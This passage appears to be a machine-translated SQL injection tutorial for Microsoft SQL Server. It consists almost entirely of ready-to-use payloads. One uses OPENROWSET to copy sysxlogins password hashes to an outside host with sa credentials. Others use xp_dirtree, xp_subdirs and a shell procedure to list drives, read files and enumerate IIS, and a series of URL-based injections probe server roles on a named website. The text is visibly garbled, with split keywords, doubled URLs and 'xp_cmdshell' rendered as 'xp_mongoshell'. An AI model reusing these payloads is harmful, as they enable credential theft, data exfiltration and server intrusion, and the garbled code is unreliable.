The essence of the Code is as follows:
The following is a reference clip:
Insert into OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1, 1433; ', 'select * from _ sysxlogins ') select * from database. dbo. sysxlogins
After obtaining the hash, you can perform brute-force cracking. This requires a lot of luck and time.
How to traverse a directory:
First create a temporary table: temp
The following is a reference clip:
5'; create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
5'; insert temp exec master. dbo. xp_availablemedia; -- get all current drives
5'; insert into temp (id) exec master. dbo. xp_subdirs 'C: '; -- get the subdirectory list
5'; insert into temp (id, num1) exec master. dbo. xp_dirtree 'C: '; -- get the directory tree structure of all subdirectories and import them to the temp table.
5'; insert into temp (id) exec master. dbo. xp_mongoshell 'Type c: webindex. asp '; -- view the content of a file
5'; insert into temp (id) exec master. dbo. xp_mongoshell 'dir c :';--
5'; insert into temp (id) exec master. dbo. xp_mongoshell 'dir c: *. asp/s/';--
5'; insert into temp (id) exec master. dbo. xp_mongoshell 'cscript C: InetpubAdminScriptsadsutil. vbs enum w3svc'
5'; insert into temp (id, num1) exec master. dbo. xp_dirtree 'C: '; -- (permission PUBLIC applies to xp_dirtree)
Write table:
The following is a reference clip:
Statement 1: _ blank> http://www.bkjia.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('sysadmin '));--
Statement 2: _ blank> http://www.bkjia.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('serveradmin '));--
Statement 3: _ blank> http://www.bkjia.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('setupadmin '));--
Statement 4: _ blank> http://www.bkjia.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('securityadmin '));--
Statement 5: _ blank> http://www.bkjia.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('securityadmin '));--
Statement 6: _ blank> http://www.bkjia.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('diskadmin '));--
Statement 7: _ blank> http://www.bkjia.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('bulkadmin '));--
Statement 8: _ blank> http://www.bkjia.com/down/list.asp? Id = 1 and 1 = (select IS_SRVROLEMEMBER ('bulkadmin '));--
Statement 9: _ blank> http://www.bkjia.com/down/list.asp? Id = 1 and 1 = (select IS_MEMBER ('db _ owner '));--
Write the path to the table:
The following is a reference clip:
_ Blank> http://www.bkjia.com/down/list.asp? Id = 1; create table dirs (paths varchar (100), id int )-
_ Blank> http: // http://www.bkjia.com/down/list.asp? Id = 1; insert dirs exec master. dbo. xp_dirtree 'C :'-
_ Blank> http: // http://www.bkjia.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs )-
_ Blank> http: // http://www.bkjia.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs where paths not in ('@ inetpub '))-
Statement: _ blank> http: // http://www.bkjia.com/down/list.asp? Id = 1; create table dirs1 (paths varchar (100), id int )--
Statement: _ blank> http: // http://www.bkjia.com/down/list.asp? Id = 1; insert dirs exec master. dbo. xp_dirtree 'e: web '--
Statement: _ blank> http: // http://www.bkjia.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs1 )-